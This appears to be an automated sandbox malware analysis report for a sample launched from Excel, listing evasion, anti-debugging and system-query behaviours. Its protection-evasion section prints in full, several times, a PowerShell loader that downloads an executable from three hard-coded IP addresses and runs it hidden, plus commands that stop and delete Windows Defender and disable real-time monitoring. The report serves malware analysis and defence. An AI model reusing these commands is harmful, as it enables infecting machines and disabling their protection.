Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking computer name)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleepgraph_20-10917
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_18-10439
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BD12E rdtsc 18_2_004BD12E
Contains functionality to query network adapater informationShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: Sleep,GetAdaptersInfo,GetAdaptersInfo,18_2_004B6B9D
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: Sleep,GetAdaptersInfo,GetAdaptersInfo,20_2_00E16B9D
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick LaunchJump to behavior
Found evasive API chain checking for process token informationShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_18-10197
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3296Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe TID: 3504Thread sleep count: 299 > 30
Source: C:\Windows\System32\taskeng.exe TID: 3708Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe TID: 3720Thread sleep count: 300 > 30
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeLast function: Thread delayed
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C31F8 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,18_2_004C31F8
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C22DE FindFirstFileW,FindNextFileW,FindClose,18_2_004C22DE
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C1368 SHGetFolderPathW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Sleep,FindNextFileW,FindClose,18_2_004C1368
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E231F8 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,20_2_00E231F8
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E222DE FindFirstFileW,FindNextFileW,FindClose,20_2_00E222DE
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E21368 SHGetFolderPathW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Sleep,FindNextFileW,FindClose,20_2_00E21368
Contains functionality to query system informationShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B59E0 GetVersionExW,GetNativeSystemInfo,GetSystemInfo,18_2_004B59E0
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: powershell.exe, 00000004.00000002.2029109285.002B0000.00000004.sdmpBinary or memory string: :vmbusres.dll
Source: powershell.exe, 00000007.00000002.2086911352.044C0000.00000004.sdmpBinary or memory string: vmbusres.dllxx
Source: powershell.exe, 00000007.00000002.2058752437.00159000.00000004.sdmpBinary or memory string: vmbusres.dll
Program exit pointsShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeAPI call chain: ExitProcess graph end nodegraph_18-13099
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeAPI call chain: ExitProcess graph end nodegraph_20-13126
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeAPI call chain: ExitProcess graph end nodegraph_20-10411
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BD12E rdtsc 18_2_004BD12E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B6105 LdrLoadDll,18_2_004B6105
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004BA298 LoadLibraryW,GetProcAddress,18_2_004BA298
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_0043C040 mov eax, dword ptr fs:[00000030h]18_2_0043C040
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_0043C076 mov eax, dword ptr fs:[00000030h]18_2_0043C076
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_0043C2E6 mov eax, dword ptr fs:[00000030h]18_2_0043C2E6
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004C0330 mov eax, dword ptr fs:[00000030h]18_2_004C0330
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_0043C040 mov eax, dword ptr fs:[00000030h]20_2_0043C040
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_0043C076 mov eax, dword ptr fs:[00000030h]20_2_0043C076
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_0043C2E6 mov eax, dword ptr fs:[00000030h]20_2_0043C2E6
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00E20330 mov eax, dword ptr fs:[00000030h]20_2_00E20330
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B1918 GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,18_2_004B1918
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_00401000 SetUnhandledExceptionFilter,__getmainargs,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,signal,signal,signal,signal,signal,signal,18_2_00401000
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 20_2_00401000 SetUnhandledExceptionFilter,__getmainargs,_iob,_setmode,_setmode,_setmode,__p__fmode,__p__environ,_cexit,ExitProcess,signal,signal,signal,signal,signal,signal,20_2_00401000
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Disables Windows Defender (deletes autostart)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c sc stop WinDefend
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c sc stop WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded j"z%,zA/P)6hjTf5q,KDKiZ.7Mxmpwhrbu
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded j"z%,zA/P)6hjTf5q,KDKiZ.7MxmpwhrbuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded j"z%,zA/P)6hjTf5q,KDKiZ.7MxmpwhrbuJump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp0251.exe 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c sc stop WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c sc delete WinDefendJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Windows\System32\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp0251.exeProcess created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WinDefendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete WinDefendJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe 'C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exe'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''%tmp%\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''%tmp%\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath %tmp%\tmp6014.bat; start-process '%tmp%\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe ''powershell.exe ''<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'');}catch{$beos1=0;}return $beos1;}$mmb1=@(''198.46.190.41/knot1.php'',''198.12.71.3/knot2.php'',''107.172.129.213/knot3.php'');foreach ($bifa in $mmb1){if(split-strings(''http://''+$bifa) -eq 1){break;} };<#validate component#>start-process ''C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe'' -windowstyle hidden;'''| out-file -encoding ascii -filepath C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat; start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp6014.bat' -windowstyle hidden'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe '<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{(new-object system.net.webclient <#replace ext#> ).downloadfile($string1,'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe');}catch{$beos1=0;}return $beos1;}$mmb1=@('198.46.190.41/knot1.php','198.12.71.3/knot2.php','107.172.129.213/knot3.php');foreach ($bifa in $mmb1){if(split-strings('http://'+$bifa) -eq 1){break;} };<#validate component#>start-process 'C:\Users\HERBBL~1\AppData\Local\Temp\tmp0251.exe' -windowstyle hidden;Jump to behavior
Contains functionality to create a new security descriptorShow sources
Source: C:\Users\user\AppData\Roaming\WinSocket\tmp0261.exeCode function: 18_2_004B5CA7 AllocateAndInitializeSid,LookupAccountSidW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,FreeSid,CloseHandle,18_2_004B5CA7

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
